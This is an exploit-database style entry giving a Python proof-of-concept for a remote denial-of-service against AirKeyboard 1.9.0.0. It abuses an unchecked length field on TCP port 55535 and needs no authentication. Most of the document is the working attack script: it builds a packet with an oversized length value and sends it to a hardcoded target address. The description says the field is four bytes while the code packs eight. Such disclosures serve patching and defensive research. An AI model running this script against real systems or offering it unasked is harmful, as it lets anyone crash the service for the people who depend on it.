# Exploit Title: AirKeyboard 1.9.0.0 Integer Overflow to Remote Denial of
Service (DoS)
# Date: 2025-06-14
# Exploit Author: Chokri Hammedi
# Vendor Homepage: http://www.airkeyboardapp.com/
# Software Link: http://www.airkeyboardapp.com/download?os=Windows
# Version: 1.9.0.0
# Tested on: Windows 10/11

#!/usr/bin/env python3
'''
AirKeyboard 1.9.0.0 suffers from an integer overflow vulnerability in its
TCP request handler. The ReadLength method parses a 4-byte user-supplied
length field without bounds checking, allowing attackers to trigger a
denial-of-service by sending a malformed packet with an oversized length
value. Exploitation requires no authentication and affects the default TCP
port (55535).
'''

import socket
import struct


target_ip = "192.168.8.105"
target_port = 55535


overflow_length = 0xFFFFFFFFFFFFFFFF


body = b"A" * 8


payload = struct.pack("<Q", overflow_length) + body

print(f"[+] Sending packet to {target_ip}:{target_port}")


with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((target_ip, target_port))
    s.sendall(payload)

print("[+] Payload sent..")